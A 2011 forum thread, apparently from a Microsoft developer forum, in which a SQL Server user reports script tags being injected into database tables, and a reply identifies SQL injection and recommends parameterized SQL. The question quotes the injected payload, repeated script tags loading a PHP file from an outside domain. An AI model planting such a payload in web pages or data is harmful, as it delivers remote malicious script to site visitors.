none
Unknown Script inserted in Database tables RRS feed

  • Question

  • Hi,

    I am using sql server 2008 64 bit. Some unknown script code inserted in the database tables often. I pasted it below.

    </title><script src=http://jhgukn.com/ur.php></script></title><script src=http://jhgukn.com/ur.php></script></title><script src=http://jhgukn.com/ur.php></script></title><script src=http://jhgukn.com/ur.php></script>

    I am using dot net as front end of this database. I don't know whether it is inserted from front end code or not. Can anyone give me the solution for stop the insertion of this unknown script.

    Thanks in advance

    • Moved by Bob Beauchemin Thursday, August 18, 2011 7:01 PM Moved to a more relevent forum (From:.NET Framework inside SQL Server)
    Thursday, August 18, 2011 12:41 PM

Answers

  • Sounds like someone's trying to hack your web application. And succeeding, if script gets inserted into database tables. Are any of your database DML calls using string concatenation based on user input? If so, change these to parameterized SQL. This is the most common (but not the only) SQL injection attack.

    Cheers, Bob

    • Marked as answer by Larcolais Gong Thursday, August 25, 2011 9:43 AM
    Thursday, August 18, 2011 7:00 PM

All replies

  • Sounds like someone's trying to hack your web application. And succeeding, if script gets inserted into database tables. Are any of your database DML calls using string concatenation based on user input? If so, change these to parameterized SQL. This is the most common (but not the only) SQL injection attack.

    Cheers, Bob

    • Marked as answer by Larcolais Gong Thursday, August 25, 2011 9:43 AM
    Thursday, August 18, 2011 7:00 PM
  • Thank you for your reply
    Friday, August 19, 2011 10:48 AM